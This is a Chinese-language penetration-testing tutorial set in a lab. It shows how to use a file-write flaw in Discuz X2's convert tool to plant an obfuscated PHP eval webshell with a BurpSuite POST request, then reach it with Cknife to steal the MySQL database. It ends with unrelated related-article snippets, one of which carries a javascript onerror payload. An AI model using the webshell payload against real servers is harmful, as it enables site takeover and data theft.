菜刀渗透

article/2025/10/1 0:11:37

快速搭建discuz论坛

使用kali下BurpSuite对discuz后台注入php木马

使用Cknife“菜刀”.上传webshell木马到网站

使用Webshell查看mysql数据库密码并盗取数据库

快速搭建discuz论坛

攻击思路

想要拿下一台主机A的权限:

1、了解一下这个服务器:端口,服务器版本,操作系统版本,找漏洞

2、拿到对A有一定权限的身份,如果对方是一个WEB服务器,就利用对方网站应用程序的漏洞,上传webshell然后提权

3、传上去后,得到apache用户普通权限,再提权成root

快速构建实验环境

搭建一个LAMP环境,部署带有漏洞的discuz论坛

1、漏洞概述:

这漏洞出现在一个DZ X系列自带的转换工具里面

漏洞路径:utility/convert/data/config.inc.php

漏洞发生的原因是: config.inc.php这个文件在黑客通过post写入时,无任何过滤检测,所以黑客可以通过past方式往confiq.inc. php由写木马程序

触发漏洞过程:

1、在浏览器中访问打开http://192.168.138.146/utility/convert/index.php

2、使用/utility/convert/index.php 进行版本转换时,会自动创建utility/convert/data/config.inc.php文件

3、config.inc.php文件没有做过滤,黑客可以使用post方法对config.inc.php注入木马程序

渗透思路:

在centos7虚拟机xuegod63.上搭建LAMP环境

yum -y install mariadb-server mariadb httpd php php-mysql     # 安装LAMP环境
systemctl start httpd
systemctl start mariadb
mysqladmin -u root password '123456'
mysql -uroot -p123456MariaDB [(none)]> 
unzip Discuz_X2_SC_UTF8.zip
mv upload/* /var/www/html/
mv utility/ /var/www/html/
cd /var/www/html/
chown -R apache:apache uc_server/ data/ config/ uc_client/
chown -R apache:apache utility/convert/data/
iptables -F  # 清空防火墙

浏览器输入http://192.168.138.146安装配置discuz论坛

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HF2sgyF9-1585301236417)(C:\Users\Jsck\Desktop\kali渗透\菜刀1.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L8dNfCM1-1585301236418)(C:\Users\Jsck\Desktop\kali渗透\菜刀2.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4t8is6cI-1585301236419)(C:\Users\Jsck\Desktop\kali渗透\菜刀3.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UxqjvJ0x-1585301236420)(C:\Users\Jsck\Desktop\kali渗透\菜刀4.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kuJLRNeq-1585301236420)(C:\Users\Jsck\Desktop\kali渗透\菜刀5.png)]

使用kali 下BurpSuite对discuz后台注入php木马

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S4DsF8iW-1585301236421)(C:\Users\Jsck\Desktop\kali渗透\菜刀6.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-L9g62mGn-1585301236422)(C:\Users\Jsck\Desktop\kali渗透\菜刀7.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5QbaYaeO-1585301236422)(C:\Users\Jsck\Desktop\kali渗透\菜刀8.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-x0ipIk1p-1585301236423)(C:\Users\Jsck\Desktop\kali渗透\菜刀9.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gUPcx44Y-1585301236423)(C:\Users\Jsck\Desktop\kali渗透\菜刀10.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ekvOtwGI-1585301236424)(C:\Users\Jsck\Desktop\kali渗透\菜刀11.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qJTBECEv-1585301236425)(C:\Users\Jsck\Desktop\kali渗透\菜刀12.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NCsdL72S-1585301236425)(C:\Users\Jsck\Desktop\kali渗透\菜刀13.png)]

在浏览IP://utility/convert/

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vpitzG3H-1585301236425)(C:\Users\Jsck\Desktop\kali渗透\菜刀14.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w5ljd2Xl-1585301236426)(C:\Users\Jsck\Desktop\kali渗透\菜刀15.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oxvFY8Oq-1585301236426)(C:\Users\Jsck\Desktop\kali渗透\菜刀16.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D0FDjPFD-1585301236427)(C:\Users\Jsck\Desktop\kali渗透\菜刀17.png)]

请求断开

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sgt5QRcE-1585301236427)(C:\Users\Jsck\Desktop\kali渗透\菜刀18.png)]

回到burpsuite查看截取到浏览器数据包:如果之前抓取到了别的数据包,需要先点击forward按钮,把之前的http请求都放行了,然后再访问我们需要访问的链接

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-g0uLXu95-1585301236427)(C:\Users\Jsck\Desktop\kali渗透\菜刀19.png)]

右键点击空白处,选择sendto repeater, repeater [ru I pi:ta®]中继器

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LcX9zmq8-1585301236428)(C:\Users\Jsck\Desktop\kali渗透\菜刀20.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FY6xnLbW-1585301236429)(C:\Users\Jsck\Desktop\kali渗透\菜刀21.png)]

删掉

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uyi2Y9K8-1585301236429)(C:\Users\Jsck\Desktop\kali渗透\菜刀22.png)]

修改第一行:

GET /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1

为:注意 POST 后面没有回车 ,这里是文本显示自劢换行了。

POST

/utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes HTTP/1.1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YiASO0rv-1585301236429)(C:\Users\Jsck\Desktop\kali渗透\菜刀23.png)]

注:这是一个 php 一句话木马加密后的内容。翻译后的内容为:

POST /utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval("$_POST[c];");//]=aaaa&submit=yes

再转换%0a%0d 代表回车换行

POST /utility/convert/index.phpa=config&source=d7.2_x2.0&newconfig[aaaeval("$_POST[c];")😉;

扩展 eval()凼数:

eval()凼数中的 eval 是 evaluate 的简称,这个凼数的作用就是把一段字符串当作 PHP 语句来执行,

一般情况下丌建议使用容易被黑客利用,evaluate [ɪvæljueɪt] 评价

eval(“echo’hello world’;”); 等同于下边的代码:

echo"hello world"; 在浏览器中都输出:hello world

修改完成后发送数据包

登录 CentOS 上,查看刚通过该漏洞注入的文件:

cd /var/www/html/utility/convert/data/
vim config.inc.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EYSMpoau-1585301236430)(C:\Users\Jsck\Desktop\kali渗透\菜刀24.png)]

使用 Cknife“菜函”上传 webshell 木马到网站

搭建 java 环境

yum -y install java
java -version
java -jar Cknife.jar

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KGKBXzTm-1585301236430)(C:\Users\Jsck\Desktop\kali渗透\菜刀25.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UQ4nSEeT-1585301236431)(C:\Users\Jsck\Desktop\kali渗透\菜刀26.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-99hNMPBk-1585301236432)(C:\Users\Jsck\Desktop\kali渗透\菜刀27.png)]

http://192.168.138.149/utility/convert/data/config.inc.php

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tJKTO34l-1585301236433)(C:\Users\Jsck\Desktop\kali渗透\菜刀28.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8IeGykNj-1585301236433)(C:\Users\Jsck\Desktop\kali渗透\菜刀29.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Gz43Q7wF-1585301236434)(C:\Users\Jsck\Desktop\kali渗透\菜刀30.png)]


http://chatgpt.dhexx.cn/article/VZeFhvRo.shtml

相关文章

无法直接打开jar文件,提示“你要以何种方式打开.jar文件”(已解决)

问题引入: 网络安全&CTF竞赛中有很多封装好的工具类似Cknife/CTFcrackTools.jar/Stegsolve.jar需要java环境打开 问题描述: .jar文件只能通过dos命令打开,点击jar文件提示你要以何种方式打开.jar文件,并且选中jdk/bin/java…

开源渗透测试工具合集

子域名枚举工具 子域枚举和信息收集工具 Anubis 项目地址:https://github.com/jonluca/Anubis使用名为 Hacking with search engine 的技术列出有关主域的子域 N4xD0rk 项目地址:https://github.com/n4xh4ck5/N4xD0rk子域名爆破枚举工具 subDomainsBrut…

DVWA的upload文件上传漏洞(全难度)(小白向)

提示:只是为了方便理解,但不一定符合您的要求 文章目录 一、等级:low 二、等级:medium 三、等级:high 四:等级:impossible 前言 靶机ip:192.168.229.145 DVWA版本:v1.…

c php乱码,Cknife的PHP功能部分修正,解决SHELL无法回显以及中文乱码

在现在满大街菜刀都存在后门问题的时候,Cknife横空出世了。因为开源,所以安全。因为可操作的空间挺大的,也十分适合过各种WAF。下面就是解决两个常见问题的过程。希望可以帮到各位白帽子。 但是使用过程中也遇到了一些小问题,被吐槽最多的就是…

致远OA_0day批量植Cknife马一步到位

最近各位师傅都在刷这个嘛,原本的exp是上传一个test123456.jsp的命令执行的马子,不过我在试的时候发现替换成C刀一句话出错,原因未知,并且test123456.jsp如果存在的话用原来exp是无法覆盖的。参考改进了t00ls师傅的代码(https://www.t00ls.ne…

linux 安全狗 乱码,打狗棒法之:Cknife(C刀)自定义模式秒过安全狗

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 相关阅读: 0x00 前言 很多朋友在使用Cknife时都误以为她只是菜刀的跨平台升级版,仅仅多了跨平台的功能,其实小伙伴…

Cknife流量分析

本文首发&#xff1a;https://<img src1 οnerrοr\u006coc\u0061tionj\x61v\x61script:\x61lert\x281\x29>testdemo 0x01 环境 <?php eval($_REQUEST[shell] ?> 0x02 命令执行 执行命令结果如下图所示 POST的数据如下图所示 对POST的数据解码 #shell eval(base6…

渗透工具环境篇——Cknife中国菜刀的使用

提要 在学习上传漏洞的时候研究到了Cknife这个软件。下面来介绍一下菜刀的使用方法。 使用 1.下载菜刀&#xff0c;打开Cknife.jar软件 2.右键点击添加 3.输入上传的php文件&#xff0c;php文件密码&#xff0c;脚本类型选择PHP&#xff0c;字符编码GB2312&#xff0c;点…

关于cknife与burpsuite对java的版本需求的冲突机器解决办法

之前安装burpsuite时候使用的是jdk11,一直使用的没有问题&#xff0c;后来接触到了cknife,但在使用时却发现cknife需要jre1.7以上版本&#xff0c;但这有是burpsuit无法兼容的&#xff0c;翻来覆去整了半天&#xff0c;终于搞定了。。 1.先删除jdk-11 2.下载jdk-7u80,这里面是…

打狗棒法之:Cknife(C刀)自定义模式秒过安全狗(二)

免责声明&#xff1a;本站提供安全工具、程序(方法)可能带有攻击性&#xff0c;仅供安全研究与教学之用&#xff0c;风险自负! 000 前言 亲爱的Chora小伙伴在上文说过&#xff0c;他是一个有责任心的基佬&#xff0c;要手把手为大家&#xff08;不&#xff09;负责任的讲解如何…

图像位运算、掩模

图像位运算、掩模 原图 添加的RGB图像 1. 选取原图中的感兴趣的区域&#xff0c;即ROI&#xff08;region of interest&#xff09; 2. 将要添加的RGB图像转换成灰度图像 img2gray cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)3. 将灰度图像进一步转成二值图像&#xff0c;即…

【图像锐化】非锐化掩模 USM(Unsharpen Mask)与锐化掩模 SM(Sharpen Mask)

非锐化掩模USM&#xff08;Unsharpen Mask&#xff09;与锐化掩模 SM&#xff08;Sharpen Mask&#xff09; 掩膜操作可以提高图像对比度&#xff0c;对比度提高可以增加图像感官度、锐化&#xff0c;让看起来有点模糊的图像更清晰。 原理&#xff1a;提取图像的高频分量&#…

2021年中国光掩模玻璃基板行业市场需求量分析:IC、FPD领域快速发展带动光掩模玻璃基板需求量不断增长[图]

一、概述 光刻掩膜版,简称掩膜版,是微纳加工技术常用的光刻工艺所使用的图形母版。由不透明的遮光薄膜在透明基板上形成掩膜图形结构,再通过曝光过程将图形信息转移到产品基片上。 光学掩模板是在薄膜、塑料或玻璃基体材料上制作各种功能图形并精确定位,以便用于光致抗蚀…

【OpenCV 】图像掩模

图像掩模&#xff08;image mask&#xff09;&#xff1a;用选定的图像、图形或物体&#xff0c;对待处理的图像&#xff08;局部或全部&#xff09;进行遮挡来控制图像处理的区域或处理过程。由于覆盖的特定图像或物体称为掩模或模板。 数字图像处理中&#xff0c;掩模为二维…

【youcans 的 OpenCV 例程200篇】179.图像分割之 GrabCut 图割法(掩模图像)

【youcans 的 OpenCV 例程200篇】176.图像分割之均值漂移算法 【youcans 的 OpenCV 例程200篇】177.图像分割之 GraphCuts 图割法 【youcans 的 OpenCV 例程200篇】178.图像分割之 GrabCut 图割法&#xff08;框选前景&#xff09; 【youcans 的 OpenCV 例程200篇】179.图像分割…

OpenCV python 掩模处理学习笔记

OpenCV python 掩模处理 前言1.1 掩模是什么1.2 掩模的原理1.3 构造掩模图像总结 前言 接上篇OpenCV Python 直方图的使用。在opencv中使用掩模对图像进行处理是一个十分常用的方法。本篇是记录掩模操作的原理及使用。小白入门&#xff0c;如有不正确的地方希望大佬指正。 提示…

OpenCV基于Python图像掩模处理

图像掩模 目标1. 图像掩模的概念2. 图像掩模的作用3. 示例演示 目标 本篇文章主要介绍图像掩模的概念、作用、及其简单实现。 1. 图像掩模的概念 图像掩模&#xff08;image mask&#xff09;是用选定的图像、图形或物体&#xff0c;对待处理的图像&#xff08;局部或全部&a…

CodedStereo:大尺度景深双目视觉的相位掩模学习(CVPR2021)

点击上方“3D视觉工坊”&#xff0c;选择“星标” 干货第一时间送达 来源丨泡泡机器人SLAM 作者丨泡泡机器人 标题&#xff1a;CodedStereo: Learned Phase Masks for LargeDepth-of-Field Stereo 作者:Shiyu Tan, Yicheng Wu, Shoou-I Yu&#xff0c; Ashok Veeraraghavan 机构…

OpenCV笔记整理【直方图和掩模】

1. 直方图&#xff1a; 直方图统计图像中各个灰度级出现的次数&#xff0c;横坐标为各个像素点的灰度级&#xff0c;纵坐标是具有该灰度级的像素个数。 上面这个九宫格我们可以想象成一张图像&#xff0c;里面的数字代表当前像素的灰度等级。 用图表显示&#xff1a;X轴代表…

数字图像处理 掩模

将logo叠加在图片上 将logo图片进行灰度化阈值处理得到掩模 (需要的部分是置非0 不需要的黑色的部分置0) 然后需要利用掩模对logo图像和人物图像分别进行处理 对logo图&#xff1a; 需要把黑色部分去掉-----与掩模进行与操作把黑色部分置0 Ps:黑色部分用add叠加时相当于没有…